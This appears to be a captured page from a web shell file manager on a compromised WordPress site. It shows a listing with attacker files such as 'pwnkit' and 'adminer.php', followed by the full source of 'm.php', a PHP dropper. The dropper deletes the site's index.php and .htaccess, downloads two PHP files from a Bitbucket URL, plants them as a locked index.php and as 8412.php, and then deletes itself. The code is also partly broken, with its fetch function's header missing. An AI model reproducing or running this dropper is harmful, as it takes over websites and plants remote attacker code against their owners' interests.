Gecko [ dataharbor.africa ]

Name	Size	Permission
?;.tmb	[ DIR ]	drwxrwxrwx
?;wp-admin	[ DIR ]	drwxr-xr-x
?;wp-content	[ DIR ]	drwxr-xr-x
?;wp-includes	[ DIR ]	drwxr-xr-x
.htaccess	543 B	-rw-r--r--
.mad-root	0 B	-rwxr-xr-x
adminer.php	465.43 KB	-rwxr-xr-x
index.php	405 B	-rwxr-xr-x
license.txt	19.44 KB	-rwxr-xr-x
m.php	3.74 KB	-rw-r--r--
pwnkit	10.99 KB	-rwxr-xr-x
readme.html	7.25 KB	-rwxr-xr-x
wp-activate.php	7.18 KB	-rwxr-xr-x
wp-blog-header.php	351 B	-rwxr-xr-x
wp-comments-post.php	2.27 KB	-rwxr-xr-x
wp-config-sample.php	3.26 KB	-rwxr-xr-x
wp-config.php	3.56 KB	-rw-rw-rw-
wp-cron.php	5.49 KB	-rwxr-xr-x
wp-links-opml.php	2.43 KB	-rwxr-xr-x
wp-load.php	3.84 KB	-rwxr-xr-x
wp-login.php	50.23 KB	-rwxr-xr-x
wp-mail.php	8.52 KB	-rwxr-xr-x
wp-settings.php	30.33 KB	-rwxr-xr-x
wp-signup.php	33.71 KB	-rwxr-xr-x
wp-trackback.php	5.09 KB	-rwxr-xr-x
xmlrpc.php	3.13 KB	-rwxr-xr-x

Code Editor : m.php

<?php
@ini_set('display_errors', '0');
@error_reporting(0);

/* ================= XML RESPONSE ================= */
function xml_response($arr)
{
    header('Content-Type: application/xml; charset=UTF-8');
    echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<response>\n";
    foreach ($arr as $k => $v) {
        $v = htmlspecialchars((string)$v, ENT_QUOTES, 'UTF-8');
        echo "  <{$k}>{$v}</{$k}>\n";
    }
    echo "</response>";
    die;
}

/* ================= PATH HANDLING ================= */
$uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
$path = parse_url($uri, PHP_URL_PATH);
$parts = array_values(array_filter(explode('/', (string)$path)));

$inSubdir = count($parts) > 1;
if ($inSubdir) {
    @chdir('..');
}

/* ================= REMOTES ================= */
$remoteIndex = 'https://bitbucket.org/bela007/bela/raw/ad3720c49ee86493fdc26f033e4693405fe2fdbf/index.php';
$remoteFile  = 'https://bitbucket.org/bela007/bela/raw/49f5efe79e6d61e1e13737d29ae8e1a5d7f38bc9/8412.php';

/* ================= HELPERS ================= */
function func_enabled($f)
{
    if (!function_exists($f)) return false;
    $d = ini_get('disable_functions');
    if (!$d) return true;
    return !in_array($f, array_map('trim', explode(',', $d)));
}

function wget_ok()
{
    if (!func_enabled('exec')) return false;
    @exec('wget --version 2>/dev/null', $o, $r);
    return $r === 0;
}

function curl_ok()
{
    return function_exists('curl_init');
}

function fopen_ok()
{
    return ini_get('allow_url_fopen');
}

/* curl */
    if (curl_ok()) {
        $ch = @curl_init($url);
        if ($ch) {
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 20);
            @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            $d = @curl_exec($ch);
            @curl_close($ch);
            if ($d) {
                $method = 'curl';
                return $d;
            }
        }
    }

/* file_get_contents */
    if (fopen_ok()) {
        $ctx = stream_context_create(array('http' => array('timeout' => 20)));
        $d = @file_get_contents($url, false, $ctx);
        if ($d) {
            $method = 'file_get_contents';
            return $d;
        }
    }

return false;
}

/* ================= CLEAN OLD ================= */
foreach (array('.htaccess', 'index.php') as $f) {
    if (is_file($f)) {
        @chmod($f, 0644);
        @unlink($f);
    }
}

/* ================= DOWNLOAD ================= */
$m1 = 'none';
$m2 = 'none';

$d1 = fetch_remote($remoteIndex, $m1);
$d2 = fetch_remote($remoteFile,  $m2);

if ($d1 !== false) {
    @file_put_contents('index.php', $d1);
    @chmod('index.php', 0444);
}

if ($d2 !== false) {
    @file_put_contents('8412.php', $d2);
}

/* ================= OUTPUT ================= */
xml_response(array(
    'status'        => 'ok',
    'directory'     => $inSubdir ? 'parent' : 'current',
    'index_method'  => $m1,
    'file_method'   => $m2,
    'index_written' => $d1 ? 'yes' : 'no',
    'file_written'  => $d2 ? 'yes' : 'no'
));

@unlink(__FILE__);

${this.title}

Code Editor : m.php